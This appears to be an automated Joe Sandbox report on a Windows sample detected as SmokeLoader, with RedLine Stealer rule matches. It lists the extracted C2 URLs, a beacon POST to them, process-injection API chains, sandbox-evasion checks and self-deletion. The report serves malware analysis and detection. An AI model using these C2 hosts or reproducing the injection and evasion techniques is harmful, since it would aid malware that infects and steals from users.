Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P2SMn3jloH.exe

Overview

General Information

Sample Name:P2SMn3jloH.exe
Analysis ID:736951
MD5:0779f7b34e9079944427b8260b49c205
SHA1:31f2cf1dc970fdfaf51b9aab2c9e0b9715fb53ec
SHA256:5c7ff5f2993bdb60d15a567dfaef41dcd30875d6629f2775acdb190e01dcef87
Tags:exeSnakeKeylogger
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found evaded block containing many API calls
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • P2SMn3jloH.exe (PID: 4020 cmdline: C:\Users\user\Desktop\P2SMn3jloH.exe MD5: 0779F7B34E9079944427B8260B49C205)
    • P2SMn3jloH.exe (PID: 3420 cmdline: C:\Users\user\Desktop\P2SMn3jloH.exe MD5: 0779F7B34E9079944427B8260B49C205)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • utisvaa (PID: 1280 cmdline: C:\Users\user\AppData\Roaming\utisvaa MD5: 0779F7B34E9079944427B8260B49C205)
    • utisvaa (PID: 5332 cmdline: C:\Users\user\AppData\Roaming\utisvaa MD5: 0779F7B34E9079944427B8260B49C205)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000C.00000002.395157811.00000000006D8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x5218:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 7 entries
      SourceRuleDescriptionAuthorStrings
      0.2.P2SMn3jloH.exe.21b15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        1.2.P2SMn3jloH.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          13.0.utisvaa.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            13.0.utisvaa.400000.4.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              13.0.utisvaa.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 2 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: P2SMn3jloH.exeReversingLabs: Detection: 46%
                Source: P2SMn3jloH.exeVirustotal: Detection: 34%Perma Link
                Source: http://host-host-file8.com/URL Reputation: Label: malware
                Source: host-file-host6.comVirustotal: Detection: 17%Perma Link
                Source: host-host-file8.comVirustotal: Detection: 16%Perma Link
                Source: C:\Users\user\AppData\Roaming\utisvaaReversingLabs: Detection: 46%
                Source: C:\Users\user\AppData\Roaming\utisvaaVirustotal: Detection: 34%Perma Link
                Source: P2SMn3jloH.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\utisvaaJoe Sandbox ML: detected
                Source: 13.0.utisvaa.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 13.0.utisvaa.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 13.0.utisvaa.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 13.0.utisvaa.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                Source: P2SMn3jloH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: C:\jexagiyad51\fuzuniguxoloyi55\nohacagepak\zevoluril\suy.pdb source: P2SMn3jloH.exe, utisvaa.2.dr
                Source: Binary string: (C:\jexagiyad51\fuzuniguxoloyi55\nohacagepak\zevoluril\suy.pdb@ source: P2SMn3jloH.exe, utisvaa.2.dr

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                Source: Malware configuration extractorURLs: http://host-file-host6.com/
                Source: Malware configuration extractorURLs: http://host-host-file8.com/
                Source: Joe Sandbox ViewASN Name: RISS-ASRU RISS-ASRU
                Source: Joe Sandbox ViewIP Address: 87.251.79.60 87.251.79.60
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dcihclar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: host-file-host6.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dcihclar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: host-file-host6.com
                Source: unknownDNS traffic detected: queries for: host-file-host6.com

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 0.2.P2SMn3jloH.exe.21b15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.P2SMn3jloH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.utisvaa.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.utisvaa.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.0.utisvaa.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.utisvaa.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.utisvaa.21a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000C.00000002.395157811.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.254069978.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: P2SMn3jloH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000C.00000002.395157811.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.254069978.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_0041A8B00_2_0041A8B0
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_0040E9700_2_0040E970
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_004199180_2_00419918
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_004139A70_2_004139A7
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_004142500_2_00414250
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00414A7C0_2_00414A7C
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_004192200_2_00419220
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00418CDC0_2_00418CDC
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_0041B4810_2_0041B481
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_0041465C0_2_0041465C
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00413E7C0_2_00413E7C
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_004187980_2_00418798
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: String function: 0040EF38 appears 38 times
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_021B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_021B0110
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,1_2_0040180C
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,1_2_00401818
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,1_2_00401822
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,1_2_00401826
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,1_2_00401834
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 12_2_021A0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,12_2_021A0110
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 13_2_0040180C Sleep,NtTerminateProcess,13_2_0040180C
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 13_2_00401818 Sleep,NtTerminateProcess,13_2_00401818
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 13_2_00401822 Sleep,NtTerminateProcess,13_2_00401822
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 13_2_00401826 Sleep,NtTerminateProcess,13_2_00401826
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 13_2_00401834 Sleep,NtTerminateProcess,13_2_00401834
                Source: P2SMn3jloH.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                Source: utisvaa.2.drStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: P2SMn3jloH.exeReversingLabs: Detection: 46%
                Source: P2SMn3jloH.exeVirustotal: Detection: 34%
                Source: P2SMn3jloH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\P2SMn3jloH.exe C:\Users\user\Desktop\P2SMn3jloH.exe
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeProcess created: C:\Users\user\Desktop\P2SMn3jloH.exe C:\Users\user\Desktop\P2SMn3jloH.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\utisvaa C:\Users\user\AppData\Roaming\utisvaa
                Source: C:\Users\user\AppData\Roaming\utisvaaProcess created: C:\Users\user\AppData\Roaming\utisvaa C:\Users\user\AppData\Roaming\utisvaa
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeProcess created: C:\Users\user\Desktop\P2SMn3jloH.exe C:\Users\user\Desktop\P2SMn3jloH.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaProcess created: C:\Users\user\AppData\Roaming\utisvaa C:\Users\user\AppData\Roaming\utisvaaJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\utisvaaJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@4/1
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00405467 SetLastError,GetTickCount,LoadLibraryA,AreFileApisANSI,GetNamedPipeHandleStateW,InterlockedIncrement,EnterCriticalSection,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedExchange,GetPrivateProfileStructA,EnterCriticalSection,InterlockedCompareExchange,EnumCalendarInfoA,LocalUnlock,CancelDeviceWakeupRequest,GetComputerNameW,EnterCriticalSection,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,InterlockedIncrement,GetCharWidthA,SetThreadToken,MoveFileWithProgressA,FindNextVolumeA,GetModuleHandleA,CreateActCtxW,VerifyVersionInfoA,InterlockedDecrement,InterlockedIncrement,MoveFileWithProgressA,WriteConsoleW,GlobalFindAtomW,LoadLibraryW,MoveFileWithProgressA,SetProcessAffinityMask,GetACP,DefineDosDeviceW,GetDiskFreeSpaceExW,InterlockedExchange,GetPrivateProfileStructW,LockFile,_lread,ReadConsoleInputW,GetPrivateProfileIntA,OpenJobObjectW,GetTapeParameters,GetMailslotInfo,CopyFileW,GetSystemWindowsDirectoryA,OpenFileMappingA,GetConsoleAliasesLengthA,SetFileTime,0_2_00405467
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00405224 CallNamedPipeA,GetThreadPriority,SearchPathA,OpenEventA,FindResourceW,GetVersionExA,SetWaitableTimer,CopyFileW,WriteConsoleInputA,SizeofResource,GlobalDeleteAtom,lstrlenW,GetModuleHandleA,GetWindowsDirectoryA,MapViewOfFileEx,GlobalGetAtomNameA,DebugBreak,LocalUnlock,VerifyVersionInfoW,0_2_00405224
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCommand line argument: PpA0_2_00416FA0
                Source: P2SMn3jloH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\jexagiyad51\fuzuniguxoloyi55\nohacagepak\zevoluril\suy.pdb source: P2SMn3jloH.exe, utisvaa.2.dr
                Source: Binary string: (C:\jexagiyad51\fuzuniguxoloyi55\nohacagepak\zevoluril\suy.pdb@ source: P2SMn3jloH.exe, utisvaa.2.dr
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_004088F4 push eax; ret 0_2_00408912
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_0040A483 push ecx; ret 0_2_0040A496
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_0040EF7D push ecx; ret 0_2_0040EF90
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_021B1970 push ebx; iretd 0_2_021B19B7
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_021B1977 push ebx; iretd 0_2_021B19B7
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_021B198B push ebx; iretd 0_2_021B19B7
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 1_2_004011D0 push ebx; iretd 1_2_00401217
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 1_2_004011D7 push ebx; iretd 1_2_00401217
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 1_2_004011EB push ebx; iretd 1_2_00401217
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 12_2_021A198B push ebx; iretd 12_2_021A19B7
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 12_2_021A1970 push ebx; iretd 12_2_021A19B7
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 12_2_021A1977 push ebx; iretd 12_2_021A19B7
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 13_2_004011D0 push ebx; iretd 13_2_00401217
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 13_2_004011D7 push ebx; iretd 13_2_00401217
                Source: C:\Users\user\AppData\Roaming\utisvaaCode function: 13_2_004011EB push ebx; iretd 13_2_00401217
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeCode function: 0_2_00417194 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00417194
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\utisvaaJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\utisvaaJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\p2smn3jloh.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\utisvaa:Zone.Identifier read attributes | deleteJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: utisvaa, 0000000D.00000002.408489516.00000000001FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\utisvaaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\explorer.exe TID: 2436Thread sleep count: 627 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1172Thread sleep count: 340 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1172Thread sleep time: -34000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2680Thread sleep count: 355 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2680Thread sleep time: -35500s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2136Thread sleep count: 511 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5176Thread sleep count: 217 > 30Jump to behavior
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-11653
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 627Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 355Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 511Jump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeEvaded block: after key decisiongraph_0-11731
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\P2SMn3jloH.exeSystem information queried: ModuleInformationJump to behavior
                Source: explorer.exe, 00000002.00000000.313587656.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
                Source: explorer.exe, 00000002.00000000.313587656.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: explorer.exe, 00000002.00000000.343231821.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                Source: explorer.exe, 00000002.00000000.313587656.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
